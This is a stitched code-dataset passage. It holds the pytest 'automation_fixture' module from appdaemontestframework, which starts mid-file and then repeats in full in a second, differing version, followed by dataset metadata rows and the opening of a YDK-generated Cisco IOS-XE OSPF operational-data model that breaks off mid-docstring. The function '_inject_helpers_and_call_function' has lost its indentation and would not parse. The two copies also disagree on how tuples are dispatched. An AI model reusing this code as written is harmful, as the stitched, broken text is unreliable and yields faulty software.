            ensure_automation_is_valid(automation)
    def __call__(self, function):
        @pytest.fixture(params=self.automation_classes, ids=self._generate_id)
        def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks):
            automation_class = request.param
            return _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks)
        return automation_fixture_with_initialisation
    def _generate_id(self, automation_classes):
        # Test id shown by pytest for each parametrized automation class.
        return automation_classes.__name__
class _AutomationFixtureDecoratorWithArgs:
    """Decorator used when `automation_fixture` receives (class, args) tuples.

    Like the no-args variant, but each parametrization yields a
    (initialized_automation, args) tuple.
    """
    def __init__(self, automation_classes_with_args):
        self.automation_classes_with_args = automation_classes_with_args
        # Validate up front so a malformed automation fails at decoration time.
        for automation, _args in self.automation_classes_with_args:
            ensure_automation_is_valid(automation)
    def __call__(self, function):
        @pytest.fixture(params=self.automation_classes_with_args, ids=self._generate_id)
        def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks):
            automation_class = request.param[0]
            automation_args = request.param[1]
            automation = _instantiate_and_initialize_automation(
                function, automation_class, given_that, hass_functions, hass_mocks)
            return (automation, automation_args)
        return automation_fixture_with_initialisation
    def _generate_id(self, automation_classes_with_args):
        # Test id shown by pytest: the automation class's name.
        return automation_classes_with_args[0].__name__
def automation_fixture(*args):
    """Decorator that seamlessly initializes and injects an automation fixture.

    Four accepted call shapes:
      - Single class:            @automation_fixture(MyAutomation)
      - Multiple classes:        @automation_fixture(MyAutomation, MyOtherAutomation)
      - Single class w/ params:  @automation_fixture((Bedroom, {'motion': '...'}))
      - Multiple w/ params:      @automation_fixture((Bedroom, {...}), (Bathroom, {...}))

    With multiple classes, tests are generated for each automation.  With
    params, the injected object is a tuple `(initialized_automation, params)`.

    The decorated function body runs *before* the automation is initialized;
    it may request the fixtures 'given_that', 'hass_mocks', or the deprecated
    'hass_functions' as parameters.  Its return value is ignored.

    Example:
        @automation_fixture(Bathroom)
        def bathroom(given_that):
            given_that.time_is(time(hour=13))
        # -> `Bathroom` is initialized and available in tests as `bathroom`
    """
    no_classes_given = not args or isfunction(args[0])
    if no_classes_given:
        raise AutomationFixtureError(
            'Do not forget to pass the automation class(es) as argument')
    # `type(...) is tuple` (not isinstance) matches the original dispatch:
    # only exact tuples select the with-args variant.
    if type(args[0]) is tuple:
        return _AutomationFixtureDecoratorWithArgs(args)
    return _AutomationFixtureDecoratorWithoutArgs(args)
| 38.844444
| 149
| 0.707809
|
import warnings
from inspect import isfunction, signature
import pkg_resources
import pytest
from appdaemon.plugins.hass.hassapi import Hass
from appdaemontestframework.common import AppdaemonTestFrameworkError
class AutomationFixtureError(AppdaemonTestFrameworkError):
    """Raised when an `@automation_fixture` declaration or its automation class is invalid."""
    pass
def _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks):
    """Run the fixture body, then construct and initialize the automation under test.

    The user's fixture `function` runs first (with its requested helpers
    injected) so any pre-initialization setup happens before `initialize()`.
    Mock call records are cleared afterwards, so tests only observe calls
    made by the test itself.
    """
    _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks)

    # The automation constructor is called with 7 positional arguments; only
    # the second (the app name) carries information — the rest are stubbed
    # out with None for testing.
    constructor_args = [None] * 7
    constructor_args[1] = automation_class.__name__
    instance = automation_class(*constructor_args)

    instance.initialize()
    given_that.mock_functions_are_cleared()
    return instance
def _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks):
injectable_fixtures = {
'given_that': given_that,
'hass_functions': hass_functions,
'hass_mocks': hass_mocks,
}
def _check_valid(param):
if param not in injectable_fixtures:
raise AutomationFixtureError(
f"'{param}' is not a valid fixture! | The only fixtures injectable in '@automation_fixture' are: {list(injectable_fixtures.keys())}")
if param == 'hass_functions':
warnings.warn(
"""
Injecting `hass_functions` into automation fixtures is deprecated.
Replace `hass_functions` with `hass_mocks` injections and access hass_functions with `hass_mocks.hass_functions`
""",
DeprecationWarning)
args = []
for param in signature(function).parameters:
_check_valid(param)
args.append(injectable_fixtures.get(param))
function(*tuple(args))
def ensure_automation_is_valid(automation_class):
    """Validate that `automation_class` is usable as an automation fixture.

    Raises AutomationFixtureError unless the class: defines `initialize`,
    gives it no parameter besides `self`, does not override `__init__`,
    and subclasses appdaemon's `Hass`.
    """
    # Guard clauses, checked in the same order as the original predicates.
    if 'initialize' not in dir(automation_class):
        raise AutomationFixtureError(
            f"'{automation_class.__name__}' has no 'initialize' function! Make sure you implemented it!")

    initialize_params = signature(getattr(automation_class, 'initialize')).parameters
    if list(initialize_params.keys()) != ["self"]:
        raise AutomationFixtureError(
            f"'{automation_class.__name__}' 'initialize' should have no arguments other than 'self'!")

    # Check the class's own __dict__ so an inherited __init__ is allowed.
    if '__init__' in automation_class.__dict__:
        raise AutomationFixtureError(f"'{automation_class.__name__}' should not override '__init__'")

    if not issubclass(automation_class, Hass):
        raise AutomationFixtureError(f"'{automation_class.__name__}' should be a subclass of 'Hass'")
class _AutomationFixtureDecoratorWithoutArgs:
    """Decorator backing `automation_fixture` when bare automation classes are given.

    Validates each class up front, and when applied to a fixture function
    produces a parametrized pytest fixture that yields one initialized
    automation per declared class.
    """

    def __init__(self, automation_classes):
        self.automation_classes = automation_classes
        # Fail fast: reject invalid automation classes at decoration time,
        # before pytest ever collects the fixture.
        for klass in self.automation_classes:
            ensure_automation_is_valid(klass)

    def __call__(self, function):
        @pytest.fixture(params=self.automation_classes, ids=self._generate_id)
        def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks):
            # `request.param` is the automation class for this parametrization.
            return _instantiate_and_initialize_automation(
                function, request.param, given_that, hass_functions, hass_mocks)

        return automation_fixture_with_initialisation

    def _generate_id(self, automation_classes):
        # pytest invokes this once per param with a single class object.
        return automation_classes.__name__
class _AutomationFixtureDecoratorWithArgs:
    """Decorator backing `automation_fixture` when (class, params) tuples are given.

    Validates every automation class up front, and when applied to a fixture
    function produces a parametrized pytest fixture that yields
    `(initialized_automation, params)` pairs, one per declared tuple.
    """

    def __init__(self, automation_classes_with_args):
        self.automation_classes_with_args = automation_classes_with_args
        # Fail fast: reject invalid automation classes at decoration time.
        for klass, _params in self.automation_classes_with_args:
            ensure_automation_is_valid(klass)

    def __call__(self, function):
        @pytest.fixture(params=self.automation_classes_with_args, ids=self._generate_id)
        def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks):
            # Each pytest param is an (automation_class, args) tuple.
            klass, params = request.param[0], request.param[1]
            instance = _instantiate_and_initialize_automation(
                function, klass, given_that, hass_functions, hass_mocks)
            return (instance, params)

        return automation_fixture_with_initialisation

    def _generate_id(self, automation_classes_with_args):
        # pytest invokes this once per param; the test ID is the class name
        # taken from the (class, args) tuple.
        return automation_classes_with_args[0].__name__
def automation_fixture(*args):
    """Decorator to seamlessly initialize and inject an automation fixture.

    Accepts either bare automation classes or (class, params) tuples:
    - @automation_fixture(MyAutomation)
    - @automation_fixture(MyAutomation, MyOtherAutomation)
    - @automation_fixture((Bedroom, {'motion': 'binary_sensor.bedroom_motion'}))
    - @automation_fixture((Bedroom, {...}), (Bathroom, {...}))

    With multiple classes, tests are generated for each automation. With
    parameters, the injected object is a `(initialized_automation, params)`
    tuple. Any value returned by the decorated function is ignored.

    :raises AutomationFixtureError: when called without the automation
        class(es), or when mistakenly applied directly to the fixture function.
    """
    if not args or isfunction(args[0]):
        raise AutomationFixtureError(
            'Do not forget to pass the automation class(es) as argument')

    # `isinstance` (rather than the exact `type(...) is tuple` check) is the
    # idiomatic type test and also accepts tuple subclasses, e.g. named
    # tuples of (automation_class, params).
    if not isinstance(args[0], tuple):
        automation_classes = args
        return _AutomationFixtureDecoratorWithoutArgs(automation_classes)
    else:
        automation_classes_with_args = args
        return _AutomationFixtureDecoratorWithArgs(automation_classes_with_args)
| true
| true
|
f705aabf435e5694deac5786cce3a35968d77640
| 805,471
|
py
|
Python
|
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XE_ospf_oper
This module contains a collection of YANG definitions for
monitoring the operation of ospf protocol in a Network Element.
Copyright (c) 2016\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class AddressFamily(Enum):
    """
    AddressFamily (Enum Class)

    Address family type

    .. data:: address_family_ipv4 = 0

    .. data:: address_family_ipv6 = 1

    """
    # Generated from the Cisco-IOS-XE-ospf-oper YANG model; literal names
    # and values must stay in sync with the model — do not hand-edit.
    address_family_ipv4 = Enum.YLeaf(0, "address-family-ipv4")

    address_family_ipv6 = Enum.YLeaf(1, "address-family-ipv6")
class NbrStateType(Enum):
    """
    NbrStateType (Enum Class)

    OSPF neighbor state type (the RFC 2328 neighbor state machine states)

    .. data:: ospf_nbr_down = 1
        Neighbor state down

    .. data:: ospf_nbr_attempt = 2
        Neighbor attempt state

    .. data:: ospf_nbr_init = 3
        Neighbor init state

    .. data:: ospf_nbr_two_way = 4
        Neighbor 2-way state

    .. data:: ospf_nbr_exchange_start = 5
        Neighbor exchange start state

    .. data:: ospf_nbr_exchange = 6
        Neighbor exchange state

    .. data:: ospf_nbr_loading = 7
        Neighbor loading state

    .. data:: ospf_nbr_full = 8
        Neighbor full state

    """
    # Generated from the Cisco-IOS-XE-ospf-oper YANG model; literal names
    # and values must stay in sync with the model — do not hand-edit.
    ospf_nbr_down = Enum.YLeaf(1, "ospf-nbr-down")

    ospf_nbr_attempt = Enum.YLeaf(2, "ospf-nbr-attempt")

    ospf_nbr_init = Enum.YLeaf(3, "ospf-nbr-init")

    ospf_nbr_two_way = Enum.YLeaf(4, "ospf-nbr-two-way")

    ospf_nbr_exchange_start = Enum.YLeaf(5, "ospf-nbr-exchange-start")

    ospf_nbr_exchange = Enum.YLeaf(6, "ospf-nbr-exchange")

    ospf_nbr_loading = Enum.YLeaf(7, "ospf-nbr-loading")

    ospf_nbr_full = Enum.YLeaf(8, "ospf-nbr-full")
class OspfAuthType(Enum):
    """
    OspfAuthType (Enum Class)

    OSPF Authentication type

    .. data:: ospf_auth_ipsec = 0

    .. data:: ospf_auth_trailer_keychain = 1

    .. data:: ospf_auth_trailer_key = 2

    .. data:: ospf_auth_type_none = 3

    """
    # Generated from the Cisco-IOS-XE-ospf-oper YANG model; literal names
    # and values must stay in sync with the model — do not hand-edit.
    ospf_auth_ipsec = Enum.YLeaf(0, "ospf-auth-ipsec")

    ospf_auth_trailer_keychain = Enum.YLeaf(1, "ospf-auth-trailer-keychain")

    ospf_auth_trailer_key = Enum.YLeaf(2, "ospf-auth-trailer-key")

    ospf_auth_type_none = Enum.YLeaf(3, "ospf-auth-type-none")
class OspfExternalMetricType(Enum):
    """
    OspfExternalMetricType (Enum Class)

    External metric type

    .. data:: ospf_ext_metric_type_1 = 0

    .. data:: ospf_ext_metric_type_2 = 1

    """
    # Generated from the Cisco-IOS-XE-ospf-oper YANG model; literal names
    # and values must stay in sync with the model — do not hand-edit.
    ospf_ext_metric_type_1 = Enum.YLeaf(0, "ospf-ext-metric-type-1")

    ospf_ext_metric_type_2 = Enum.YLeaf(1, "ospf-ext-metric-type-2")
class OspfNetworkType(Enum):
    """
    OspfNetworkType (Enum Class)

    OSPF network type

    .. data:: ospf_broadcast = 0
        OSPF broadcast multi-access network

    .. data:: ospf_non_broadcast = 1
        OSPF Non-Broadcast Multi-Access (NBMA) network

    .. data:: ospf_point_to_multipoint = 2
        OSPF point-to-multipoint network

    .. data:: ospf_point_to_point = 3
        OSPF point-to-point network

    """
    # Generated from the Cisco-IOS-XE-ospf-oper YANG model; literal names
    # and values must stay in sync with the model — do not hand-edit.
    ospf_broadcast = Enum.YLeaf(0, "ospf-broadcast")

    ospf_non_broadcast = Enum.YLeaf(1, "ospf-non-broadcast")

    ospf_point_to_multipoint = Enum.YLeaf(2, "ospf-point-to-multipoint")

    ospf_point_to_point = Enum.YLeaf(3, "ospf-point-to-point")
class OspfOperationMode(Enum):
    """
    OspfOperationMode (Enum Class)

    OSPF operational mode

    .. data:: ospf_ships_in_the_night = 0
        Ships-in-the-night operation mode in which each OSPF instance
        carries only one address family

    """
    # Generated from the Cisco-IOS-XE-ospf-oper YANG model; literal names
    # and values must stay in sync with the model — do not hand-edit.
    ospf_ships_in_the_night = Enum.YLeaf(0, "ospf-ships-in-the-night")
class Ospfv2AuthTypeSelection(Enum):
    """
    Ospfv2AuthTypeSelection (Enum Class)

    The authentication type

    .. data:: ospfv2_auth_none = 0
        No authentication configured

    .. data:: ospfv2_auth_trailer_key = 1
        Authentication uses the trailer key

    .. data:: ospfv2_auth_trailer_key_chain = 2
        Authentication uses a trailer key chain

    """
    # Generated from the Cisco-IOS-XE-ospf-oper YANG model; literal names
    # and values must stay in sync with the model — do not hand-edit.
    ospfv2_auth_none = Enum.YLeaf(0, "ospfv2-auth-none")

    ospfv2_auth_trailer_key = Enum.YLeaf(1, "ospfv2-auth-trailer-key")

    ospfv2_auth_trailer_key_chain = Enum.YLeaf(2, "ospfv2-auth-trailer-key-chain")
class Ospfv2CryptoAlgorithm(Enum):
    """
    Ospfv2CryptoAlgorithm (Enum Class)

    The algorithm in use

    .. data:: ospfv2_crypto_cleartest = 0
        The OSPFv2 authentication is sent as cleartext

    .. data:: ospfv2_crypto_md5 = 1
        The OSPFv2 authentication is encrypted using Message Digest 5

    """
    # Generated from the Cisco-IOS-XE-ospf-oper YANG model; literal names
    # and values must stay in sync with the model — do not hand-edit.
    # NOTE(review): 'cleartest' looks like a typo for 'cleartext', but the
    # literal must match the generated YANG identifier — do not rename here.
    ospfv2_crypto_cleartest = Enum.YLeaf(0, "ospfv2-crypto-cleartest")

    ospfv2_crypto_md5 = Enum.YLeaf(1, "ospfv2-crypto-md5")
class Ospfv2IntfState(Enum):
    """
    Ospfv2IntfState (Enum Class)

    The possible states that an interface can be in

    .. data:: ospfv2_interface_state_down = 0
        The interface is in the down state

    .. data:: ospfv2_interface_state_loopback = 1
        The interface is in loopback state

    .. data:: ospfv2_interface_state_waiting = 2
        The interface is in waiting state

    .. data:: ospfv2_interface_state_point_to_mpoint = 3
        The interface is in point-to-multipoint state

    .. data:: ospfv2_interface_state_point_to_point = 4
        The interface is in point-to-point state

    .. data:: ospfv2_interface_state_dr = 5
        The interface is in the designated router state

    .. data:: ospfv2_interface_state_backup = 6
        The interface is providing backup for another interface

    .. data:: ospfv2_interface_state_other = 7
        The interface is in a state other than the ones
        enumerated in this list

    """
    # Generated from the Cisco-IOS-XE-ospf-oper YANG model; literal names
    # and values must stay in sync with the model — do not hand-edit.
    ospfv2_interface_state_down = Enum.YLeaf(0, "ospfv2-interface-state-down")

    ospfv2_interface_state_loopback = Enum.YLeaf(1, "ospfv2-interface-state-loopback")

    ospfv2_interface_state_waiting = Enum.YLeaf(2, "ospfv2-interface-state-waiting")

    ospfv2_interface_state_point_to_mpoint = Enum.YLeaf(3, "ospfv2-interface-state-point-to-mpoint")

    ospfv2_interface_state_point_to_point = Enum.YLeaf(4, "ospfv2-interface-state-point-to-point")

    ospfv2_interface_state_dr = Enum.YLeaf(5, "ospfv2-interface-state-dr")

    ospfv2_interface_state_backup = Enum.YLeaf(6, "ospfv2-interface-state-backup")

    ospfv2_interface_state_other = Enum.YLeaf(7, "ospfv2-interface-state-other")
class Ospfv2LsaType(Enum):
    """
    Ospfv2LsaType (Enum Class)

    Link State Advertisement type

    .. data:: ospfv2_lsa_type_unsupported_lsa_type = 0

    .. data:: ospfv2_lsa_type_router = 1

    .. data:: ospfv2_lsa_type_network = 2

    .. data:: ospfv2_lsa_type_summary_net = 3

    .. data:: ospfv2_lsa_type_summary_router = 4

    .. data:: ospfv2_lsa_type_as_external = 5

    .. data:: ospfv2_lsa_type_nssa = 6

    .. data:: ospfv2_lsa_type_link_scope_opaque = 7

    .. data:: ospfv2_lsa_type_area_scope_opaque = 8

    .. data:: ospfv2_lsa_type_as_scope_opaque = 9

    """
    # Generated from the Cisco-IOS-XE-ospf-oper YANG model; literal names
    # and values must stay in sync with the model — do not hand-edit.
    ospfv2_lsa_type_unsupported_lsa_type = Enum.YLeaf(0, "ospfv2-lsa-type-unsupported-lsa-type")

    ospfv2_lsa_type_router = Enum.YLeaf(1, "ospfv2-lsa-type-router")

    ospfv2_lsa_type_network = Enum.YLeaf(2, "ospfv2-lsa-type-network")

    ospfv2_lsa_type_summary_net = Enum.YLeaf(3, "ospfv2-lsa-type-summary-net")

    ospfv2_lsa_type_summary_router = Enum.YLeaf(4, "ospfv2-lsa-type-summary-router")

    ospfv2_lsa_type_as_external = Enum.YLeaf(5, "ospfv2-lsa-type-as-external")

    ospfv2_lsa_type_nssa = Enum.YLeaf(6, "ospfv2-lsa-type-nssa")

    ospfv2_lsa_type_link_scope_opaque = Enum.YLeaf(7, "ospfv2-lsa-type-link-scope-opaque")

    ospfv2_lsa_type_area_scope_opaque = Enum.YLeaf(8, "ospfv2-lsa-type-area-scope-opaque")

    ospfv2_lsa_type_as_scope_opaque = Enum.YLeaf(9, "ospfv2-lsa-type-as-scope-opaque")
class OspfOperData(Entity):
"""
Operational state of ospf
.. attribute:: ospf_state
OSPF operational state
**type**\: :py:class:`OspfState <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState>`
**presence node**\: True
**config**\: False
.. attribute:: ospfv2_instance
The OSPF instance
**type**\: list of :py:class:`Ospfv2Instance <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData, self).__init__()
self._top_entity = None
self.yang_name = "ospf-oper-data"
self.yang_parent_name = "Cisco-IOS-XE-ospf-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ospf-state", ("ospf_state", OspfOperData.OspfState)), ("ospfv2-instance", ("ospfv2_instance", OspfOperData.Ospfv2Instance))])
self._leafs = OrderedDict()
self.ospf_state = None
self._children_name_map["ospf_state"] = "ospf-state"
self.ospfv2_instance = YList(self)
self._segment_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData, [], name, value)
class OspfState(Entity):
"""
OSPF operational state
.. attribute:: op_mode
OSPF operation mode
**type**\: :py:class:`OspfOperationMode <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperationMode>`
**config**\: False
.. attribute:: ospf_instance
OSPF routing protocol instance
**type**\: list of :py:class:`OspfInstance <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance>`
**config**\: False
This class is a :ref:`presence class<presence-class>`
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState, self).__init__()
self.yang_name = "ospf-state"
self.yang_parent_name = "ospf-oper-data"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ospf-instance", ("ospf_instance", OspfOperData.OspfState.OspfInstance))])
self.is_presence_container = True
self._leafs = OrderedDict([
('op_mode', (YLeaf(YType.enumeration, 'op-mode'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfOperationMode', '')])),
])
self.op_mode = None
self.ospf_instance = YList(self)
self._segment_path = lambda: "ospf-state"
self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState, ['op_mode'], name, value)
class OspfInstance(Entity):
"""
OSPF routing protocol instance
.. attribute:: af (key)
Address\-family of the instance
**type**\: :py:class:`AddressFamily <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.AddressFamily>`
**config**\: False
.. attribute:: router_id (key)
Defined in RFC 2328. A 32\-bit number that uniquely identifies the router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ospf_area
List of ospf areas
**type**\: list of :py:class:`OspfArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea>`
**config**\: False
.. attribute:: link_scope_lsas
List OSPF link scope LSA
**type**\: list of :py:class:`LinkScopeLsas <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas>`
**config**\: False
.. attribute:: multi_topology
OSPF multi\-topology interface augmentation
**type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.MultiTopology>`
**config**\: False
.. attribute:: process_id
The process identifier used to refer to this instance
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance, self).__init__()
self.yang_name = "ospf-instance"
self.yang_parent_name = "ospf-state"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['af','router_id']
self._child_classes = OrderedDict([("ospf-area", ("ospf_area", OspfOperData.OspfState.OspfInstance.OspfArea)), ("link-scope-lsas", ("link_scope_lsas", OspfOperData.OspfState.OspfInstance.LinkScopeLsas)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.MultiTopology))])
self._leafs = OrderedDict([
('af', (YLeaf(YType.enumeration, 'af'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'AddressFamily', '')])),
('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
('process_id', (YLeaf(YType.uint16, 'process-id'), ['int'])),
])
self.af = None
self.router_id = None
self.process_id = None
self.ospf_area = YList(self)
self.link_scope_lsas = YList(self)
self.multi_topology = YList(self)
self._segment_path = lambda: "ospf-instance" + "[af='" + str(self.af) + "']" + "[router-id='" + str(self.router_id) + "']"
self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/ospf-state/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance, ['af', 'router_id', 'process_id'], name, value)
class OspfArea(Entity):
"""
List of ospf areas
.. attribute:: area_id (key)
OSPF area ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ospf_interface
List of OSPF interfaces
**type**\: list of :py:class:`OspfInterface <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface>`
**config**\: False
.. attribute:: area_scope_lsa
List of OSPF area scope LSA
**type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea, self).__init__()
self.yang_name = "ospf-area"
self.yang_parent_name = "ospf-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['area_id']
self._child_classes = OrderedDict([("ospf-interface", ("ospf_interface", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa))])
self._leafs = OrderedDict([
('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])),
])
self.area_id = None
self.ospf_interface = YList(self)
self.area_scope_lsa = YList(self)
self._segment_path = lambda: "ospf-area" + "[area-id='" + str(self.area_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea, ['area_id'], name, value)
class OspfInterface(Entity):
"""
List of OSPF interfaces
.. attribute:: name (key)
Interface name
**type**\: str
**config**\: False
.. attribute:: network_type
Network type
**type**\: :py:class:`OspfNetworkType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfNetworkType>`
**config**\: False
.. attribute:: passive
Enable/Disable passive
**type**\: bool
**config**\: False
.. attribute:: demand_circuit
Enable/Disable demand circuit
**type**\: bool
**config**\: False
.. attribute:: multi_area
Multi Area
**type**\: :py:class:`MultiArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea>`
**config**\: False
.. attribute:: static_neighbor
Staticly configured neighbors
**type**\: list of :py:class:`StaticNeighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor>`
**config**\: False
.. attribute:: node_flag
Set prefix as a node representative prefix
**type**\: bool
**config**\: False
.. attribute:: fast_reroute
Fast reroute config
**type**\: :py:class:`FastReroute <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute>`
**config**\: False
.. attribute:: cost
Interface cost
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: hello_interval
Time between hello packets
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: dead_interval
Interval after which a neighbor is declared dead
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: retransmit_interval
Time between retransmitting unacknowledged Link State Advertisements (LSAs)
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: transmit_delay
Estimated time needed to send link\-state update
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: mtu_ignore
Enable/Disable ignoring of MTU in DBD packets
**type**\: bool
**config**\: False
.. attribute:: lls
Enable/Disable link\-local signaling (LLS) support
**type**\: bool
**config**\: False
.. attribute:: prefix_suppression
Suppress advertisement of the prefixes
**type**\: bool
**config**\: False
.. attribute:: bfd
Enable/disable bfd
**type**\: bool
**config**\: False
.. attribute:: ttl_security
TTL security
**type**\: :py:class:`TtlSecurity <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity>`
**config**\: False
.. attribute:: enable
Enable/disable protocol on the interface
**type**\: bool
**config**\: False
.. attribute:: authentication
Authentication configuration
**type**\: :py:class:`Authentication <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication>`
**config**\: False
.. attribute:: state
Interface state
**type**\: str
**config**\: False
.. attribute:: hello_timer
Hello timer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: wait_timer
Wait timer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: dr
Designated Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: bdr
Backup Designated Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ospf_neighbor
List of OSPF neighbors
**type**\: list of :py:class:`OspfNeighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor>`
